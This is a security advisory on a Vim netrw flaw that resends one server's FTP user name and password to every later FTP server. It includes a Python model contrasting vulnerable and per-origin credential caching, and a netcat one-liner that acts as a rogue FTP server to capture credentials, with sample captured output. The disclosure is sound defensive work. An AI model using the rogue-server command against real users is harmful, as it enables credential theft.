[UNIX] Vim Netrw FTP User Name and Password Disclosure



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Vim Netrw FTP User Name and Password Disclosure
------------------------------------------------------------------------


SUMMARY

"Netrw supports "transparent" editing of files on other machines using
[...] vim ftp://hostname/path/to/file". The Vim Netrw plugin shares the FTP
user name and password across all FTP sessions. Every time Vim makes a
new FTP connection, it sends the user name and password of the previous
FTP session to the FTP server.

DETAILS

Vulnerable Systems:
* Vim version 7.1.266
* Vim version 7.2
* autoload/netrw.vim version 131
* autoload/netrw.vim version 109

Once vim successfully connects to an FTP server using a user name and
password credentials, it will re-use them in all subsequent FTP sessions,
regardless of the domain name or TCP port.

This behaviour is documented, although the documentation states the
credentials are ``retained on a per-session basis''. Apparently ``session''
here means the Vim session, not the FTP session:
``g:netrw_uid (ftp) user-id, retained on a per-session basis
s:netrw_passwd (ftp) password, retained on a per-session basis''

-- Netrw Reference Manual (``pi_netrw.txt'')
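The following Python model illustrates the difference between the two meanings of ``session''. It is an added example written for this page, not netrw's code: the class names, the FtpOrigin type and the sample password are assumptions. The first cache keeps one user name and password for the whole Vim session, as g:netrw_uid and s:netrw_passwd do; the second keeps them per host and TCP port, which is what a user would expect from ``per-session''. The sequence simulated is the one the advisory describes: a successful login to one server, then a file opened on a different server.

```python
"""Model of netrw's FTP credential cache (added illustration, not netrw's
own code).  SessionWideCache mirrors the behaviour described in the
advisory; PerOriginCache is the hardened alternative.  Names and the
sample password are assumptions made for this example."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

Credentials = Tuple[str, str]  # (user name, password)


@dataclass(frozen=True)
class FtpOrigin:
    """Identity of an FTP server as seen by the client: host name and port."""
    host: str
    port: int = 21  # standard FTP control port


class SessionWideCache:
    """Vulnerable: a single (uid, passwd) pair for the whole Vim session,
    like g:netrw_uid / s:netrw_passwd.  The origin is ignored on both
    store and lookup, so any later server receives the same credentials."""

    def __init__(self) -> None:
        self._creds: Optional[Credentials] = None

    def store(self, origin: FtpOrigin, creds: Credentials) -> None:
        self._creds = creds  # origin deliberately ignored: this is the bug

    def lookup(self, origin: FtpOrigin) -> Optional[Credentials]:
        return self._creds  # same answer for every host and port


class PerOriginCache:
    """Hardened: credentials are replayed only to the host:port they were
    entered for.  A different host, or the same host on another port, is
    a different origin and gets nothing from the cache."""

    def __init__(self) -> None:
        self._creds: Dict[FtpOrigin, Credentials] = {}

    def store(self, origin: FtpOrigin, creds: Credentials) -> None:
        self._creds[origin] = creds

    def lookup(self, origin: FtpOrigin) -> Optional[Credentials]:
        return self._creds.get(origin)


def what_gets_sent(cache, first: FtpOrigin, creds: Credentials,
                   second: FtpOrigin) -> Optional[Credentials]:
    """Simulate the advisory's sequence: log in to `first` (the client
    caches the credentials after a successful login), then open a file on
    `second`.  Returns whatever the client would send to `second` without
    prompting the user; None means the user would be asked again."""
    cache.store(first, creds)
    return cache.lookup(second)


if __name__ == "__main__":
    # Hosts from the advisory; the password is a constructed sample value.
    secure = FtpOrigin("ftp.secure.example")
    rogue = FtpOrigin("ftp.rogue.example", 31337)
    creds = ("rdancer", "sample-password-not-real")
    print("session-wide cache sends:", what_gets_sent(SessionWideCache(), secure, creds, rogue))
    print("per-origin cache sends:  ", what_gets_sent(PerOriginCache(), secure, creds, rogue))
```

With the session-wide cache the second server receives the first server's user name and password; with the per-origin cache it receives nothing and the user is prompted, which is the behaviour a fix has to restore. Keying on host and port (not host alone) matters because the advisory notes the credentials are reused regardless of the TCP port as well.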

Although FTP communication is not encrypted and therefore open to
eavesdropping, where access to the network itself is protected,
credentials-based access control is meaningful and the credentials must
be kept secret. For example, an FTP connection to a virtual Xen instance
on the same physical machine is secure; so is an FTP session over a local
ethernet segment secured against access from untrusted parties.

Exploit:
No adversary action on the part of the attacker is necessary, apart from
keeping logs of the user name, password, source IP address, and other
information about the FTP session.

An example using netcat(1) as the rogue FTP server. Another FTP server is
already running on the machine:
# For the sake of this example, a custom hosts file. Note that
# ftp.secure.example and ftp.rogue.example map to different IP
# addresses.
$ grep '\.example' /etc/hosts
127.0.1.1 ftp.secure.example
127.0.1.2 ftp.rogue.example
# There is a stock FTP server running already
$ netstat -plan | grep ftp
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
# Start the rogue FTP server
$ printf '220\r\n331\r\n' \
| netcat -lp 31337 ftp.rogue.example > credentials&
# We use the ex command for clarity.
$ ex ftp://ftp.secure.example/
Enter username: rdancer
Enter Password: *************
Entering Ex mode. Type "visual" to go to Normal mode.
:spl ftp://ftp.rogue.example:31337/
"ftp://ftp.rogue.example:31337/" --No lines in buffer--
:qa!
$ cat credentials
USER rdancer
PASS z5vS24u76OrGM


ADDITIONAL INFORMATION

The information has been provided by Jan Minar <mailto:rdancer@xxxxxxxxxxx>.
The original article can be found at:
http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
